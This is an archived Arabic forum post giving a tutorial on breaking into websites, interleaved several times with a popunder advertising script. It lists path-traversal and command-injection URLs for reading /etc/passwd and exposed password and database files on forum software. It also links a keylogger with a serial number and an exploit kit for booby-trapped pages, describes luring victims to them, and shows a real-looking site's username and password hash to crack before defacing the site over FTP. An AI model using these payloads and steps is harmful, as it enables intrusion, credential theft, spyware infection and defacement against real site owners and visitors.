|
أرشيف المنتدى هنا نقل الموضوعات المكررة والروابط التى لا تعمل |
|
أدوات الموضوع | ابحث في الموضوع | انواع عرض الموضوع |
#1
|
|||
|
|||
![]()
الاختراق مش مشكلة اتفضل وشوف
جميع انواع اختراق المواقع -------------------------------------------------------------------------------- هذه الثغره اخترقت اغلب المنتديات مثال:http://host.basharnet.com/forum بسم الله الرحمن الرحيم السلام عليكم الشرح: ثغرة تصيب منتديات Web Wiz Guide أولا إذهب إلى google اكتب Web Wiz forum وانتظر لحد ماتطلع لك المواقع الي تدعم هذا المنتدى ادخل المنتدى واكتب بعد forum admin/wwforum.mdb حمل الملف وادخل عليه عن طريق microsoft office access بعد ماتاخذ باسوورد المشرف العام اذهب إلى admin سجل اسمك والباسوورد الآن أنت في لوحة التحكم ================================================== = ادا كان الموقع يدعم الفرونت بيج /_vti_pvt/service.pwd ------------------------------------------------------------------------ ------------------------------------------------------------------------ لكشف كلمة السر واسم المستخدم المشفر في بعض المواقع wwwboard/passwd.txt أو passwd.txt ------------------------------------------------------------------------ ------------------------------------------------------------------------دخول قاعدة البيانات database/philboard.mdb دخول لوحة التحكم philboard_admin.asp ============================================== أول شي لازم أعلمكم الأساسيات في اختراق أي موقع مجاني: 1-معرفة إصدار المتصفح 2-معرفة بيانات صاحب الموقع مثل إيميل ماسنجر أو يتوفر لديه سجل زوار 3-برنامج سرقة كل ماكتبه الضحية من باسوورد + برنامج إلغام المواقع ========(الشرح)======== 1- كيف تعرفه هذا من أبسط العمليات التي سوف تقوم بها إبحث في أسفل الموقع راح تجد يفضل تصفحة بدقة معينة وحلوها لازم تلاقي إصدار الإكسبلورر (المتصفح اللي يستخدمه الموقع) 2-هذا عاد عليك أنا مالي شغل إنت المفروض تعرفه وتجيبه بنفسك 3-سوف نتطرق إليها في الأسفل ------------------------------------------------- +=+ كيف تخدع الضحية وتجبره على فتح الموقع الملغوم اللي لو فتحه راح يتحمل الملف التجسسي في جهازه وتتملكه بالكامل +=+ (هذي اصعب نقطة في الدرس) لكن إنشاء الله أستطيع تقريب الفكرة لديكم ناخذ مثال على http://www.freeservers.com تحدد نوعية الشركة للموقع وتذهب إليه ليش؟ عشان تسجل فيه ويرسلون لك البيانات وعاد إنت ألحين عندك التصميم حق البيانات للموقع اللي سجل فيه نفسه (الضحية) <><الفكرة ومافيها تخلي الضحية يفتح موقعك><> وألحين ترسله الرسالة اللي أرسلوها لك FreeServers له عشان يفتح موقعك الملغوم طيب لو ماعنده إيميل كيف تلعب عليه بسيطة فيه شي اسمه سجل الزوار روح عنده واكتب له تفضل وشوف هذا الموقع هذا نفس تصميمك ونفس كل شي (((إلعب عليه))) الآن سوف نعتمد على برنامج خطير جدا وقوي ولا يكشفه إصدارات النورتورن القديمة ماقبل 2001 وظيفة البرنامج/تسجيل كل ماكتبه الضحية من باسوورد وكل مالديه وصلة البرنامج/http://www.mikkotech.com/kk2000pro.exe ال****** نمبر/SN: K100-43-109-0-793218E876A4C9-29 برنامج في غاية القوة والبساطة <<<لاتحكم قبل أن تجرب الآن انتهينا من تحميل برنامج التجسس لم يبقى سوى برنامج لتلغيم المواقع godwillوهو البرنامج الخاص لالغام الموقع على انترنت اكسبلور5 و 5.5((هذه هي سر المهنه))ووصلته http://www.thecorpz.org/activex/gwpackage.zip واللي يبغى الشرح التوضيحي يروح الشرح هذا arabteam.nicmatic.com/vb/forumdisplay.php?forumid=2 + الفريق العربي للبرمجة + =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= والحين وبعد ماخلصنا من وضع الصفحة الملغومة نخلي الضحية تفتحها بالطرق اللي ذكرتها =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ][?][وبعد أن تفتح الضحية موقعك الملغوم مهمتك تصبح الانتظار][?][ ================================================== = :"hacker": (ثغرات etc/passwd: هي ثغرات تكون في المجلد etc وتحتوي على الباسوورد) -الشرح باختصار: اسم الثغرة : /../../../../../../../etc/passwd هده الثغرة من اخطر الثغرات وهي تحتوي على الباسوردات ويمكن سحبها وتكون في مجلد etc?/ او etc/ وتكون على مثال : (مثل هده الأمثلة): /cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd /cgi-bin/webplus?script=/../../../../etc/passwd /cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd /cgi-bin/webutil.pl?;%20cat%20/etc/passwd /cgi-bin/wrap?/../../../../../etc palsAction=restart&documentName=../../../../../../../etc/passwd وستكون الثغرة قليلة العدد في المواقع كثيرة الخطر وتكون مبتدا بــــــــــــــcgi-bin/ في العادة <script> var once_per_session=0 function get_******(Name) { var search = Name + "=" var returnvalue = ""; if (document.******.length > 0) { offset = document.******.indexOf(search) if (offset != -1) { offset += search.length end = document.******.indexOf(";", offset); if (end == -1) end = document.******.length; returnvalue=unescape(document.******.substring(off set, end)) } } return returnvalue; } function loadornot(){ if (get_******('popunder')==''){ loadpopunder() document.******="popunder=yes" } } function loadpopunder(){ win2=window.open("http://www.jeeran.com/asp-bin/popads/pop_commbannerad.asp","memberads","width=500,heigh t=150,personalbar=no,location=no,toolbar=no,status =no,menubar=no,scrollbars=no") win2.blur() window.focus() } if (once_per_session==0) loadpopunder() else loadornot() </script> =============================================== اسم الثغرة : /cgi-bin معلومات عنها : من اهم الثغرات التي تتركز عليها لنكات اخرى لثغرات مختلفة وهي منتشرة للغاية جدا قد تكون هكدا : /cgi-bin/news.cgi وقد تكون :/cgi-bin/mailnews.cgi و: /cgi-bin/mlog.shtml /cgi-bin/mlog.phtml /cgi-bin/mlog.htm /cgi-bin/minimal.exe /cgi-bin/mini_logger.cgi /cgi-bin/****.pl /cgi-bin/message.cgi /cgi-bin/mdma.bat /cgi-bin/man.sh وهي داخلة للكثير من العمليات مثال: /cgi-bin/pals-cgi?palsAction=restart&documentName=../../../../../../../etc/passwd /cgi-bin/pals-cgi /cgi-bin/page-og.cgi /cgi-bin/pagelog.cgi /cgi-bin/nto /cgi-bin/ntitar.pl /cgi-bin/nph-test-cgi /cgi-bin/nph-publish /cgi-bin/nph-proxy.cgi /cgi-bin/nph-error.pl /cgi-bin/nph-error.cgi /cgi-bin/nlog-smb.pl /cgi-bin/nlog-smb.cgi /cgi-bin/nlog-smb /cgi-bin/news/news.cgi /cgi-bin/news.cgi /cgi-bin/netauth.cgi /cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w /cgi-bin/multihtml.pl?multi=/etc/passwd%00html ومن اخطرها /cgi-bin/password.txt /cgi-bin/password /cgi-bin/passwords.txt /cgi-bin/passwd وتكون اخطر للغاية في: /cgi-bin/password.txt و/cgi-bin/passwords.txt وتكون على ملف تكست يحتوي جميع اسماء المشتركين والباسوورد والأيميل ... <script> var once_per_session=0 function get_******(Name) { var search = Name + "=" var returnvalue = ""; if (document.******.length > 0) { offset = document.******.indexOf(search) if (offset != -1) { offset += search.length end = document.******.indexOf(";", offset); if (end == -1) end = document.******.length; returnvalue=unescape(document.******.substring(off set, end)) } } return returnvalue; } function loadornot(){ if (get_******('popunder')==''){ loadpopunder() document.******="popunder=yes" } } function loadpopunder(){ win2=window.open("http://www.jeeran.com/asp-bin/popads/pop_commbannerad.asp","memberads","width=500,heigh t=150,personalbar=no,location=no,toolbar=no,status =no,menubar=no,scrollbars=no") win2.blur() window.focus() } if (once_per_session==0) loadpopunder() else loadornot() </script> ================================================== ===== اسم الثغرة : ثغرات التكست txt// معلومات عنها : من اخطر الثغرات ان لم تعد الأقوى لتكون سبب للاختراق مثال عليها : /wforum/passwd.txt /wwwboard/password /wwwboard/passwd.txt /WebShop/templates/cc.txt /WebShop/logs/cc.txt /webboard/password.txt /webaccess/access-options.txt /sults_Test/testorder.txt /robots.txt /post32.exe|echo%20>c:\text.txt /orders/orders.txt /forums/passwd.txt والكثير الكثير واخطرها ما ينتهي بكلمة passwd.txt اوpass.txt او password.txt و /robots.txt او root.txt <script> var once_per_session=0 function get_******(Name) { var search = Name + "=" var returnvalue = ""; if (document.******.length > 0) { offset = document.******.indexOf(search) if (offset != -1) { offset += search.length end = document.******.indexOf(";", offset); if (end == -1) end = document.******.length; returnvalue=unescape(document.******.substring(off set, end)) } } return returnvalue; } function loadornot(){ if (get_******('popunder')==''){ loadpopunder() document.******="popunder=yes" } } function loadpopunder(){ win2=window.open("http://www.jeeran.com/asp-bin/popads/pop_commbannerad.asp","memberads","width=500,heigh t=150,personalbar=no,location=no,toolbar=no,status =no,menubar=no,scrollbars=no") win2.blur() window.focus() } if (once_per_session==0) loadpopunder() else loadornot() </script> ============================================= اسم الثغرة : /file/ /files/ ثغرة تستعرض جميع ملفات الموقع المخفية وغير المخفية <script> var once_per_session=0 function get_******(Name) { var search = Name + "=" var returnvalue = ""; if (document.******.length > 0) { offset = document.******.indexOf(search) if (offset != -1) { offset += search.length end = document.******.indexOf(";", offset); if (end == -1) end = document.******.length; returnvalue=unescape(document.******.substring(off set, end)) } } return returnvalue; } function loadornot(){ if (get_******('popunder')==''){ loadpopunder() document.******="popunder=yes" } } function loadpopunder(){ win2=window.open("http://www.jeeran.com/asp-bin/popads/pop_commbannerad.asp","memberads","width=500,heigh t=150,personalbar=no,location=no,toolbar=no,status =no,menubar=no,scrollbars=no") win2.blur() window.focus() } if (once_per_session==0) loadpopunder() else loadornot() </script> ============================================= ثغرة الـWWWBoard هي أسهل ثغرة بالإضافة إلى الفرونت بيج. لنفترض أن الموقع المراد إختراقه هو http://www.boardprep.net/ لنضف إليه wwwboard/passwd.txt فيصبح العنوان http://www.boardprep.net/wwwboard/passwd.txt نفتح العنوان سوف تجد cknouse:aexMVWnDOyrdE كلمة المرور:إسم المستخدم يعني إسم المستخدم هو cknouse وكلمة المرور هيaexMVWnDOyrdE فك تشفيره بجون ذي ريبر الذي تم شرحه بالعنوان التالي http://www.3asfh.com/vb/showthread.php?s=&threadid=653 الحين عندك إسم المستخدم وكلمة المرور وش تسوي عشان تغير الصفحة الرئيسية روح للفتب وإكتب ftp.domen.com ملاحظة إستبدل domen.com بإسم الموقع إلي عندك باسوورده وحط اليوزر نيم والباسس وإدخل على الموقع أنشئ صفحة بإسم index.html وإرفعها للموقع لتحميل الفتب http://www.motken.com/dawnload/porogram/wsftppro.zip تقبلوا تحياتى العقرب الاسود |
العلامات المرجعية |
أدوات الموضوع | ابحث في الموضوع |
انواع عرض الموضوع | |
|
|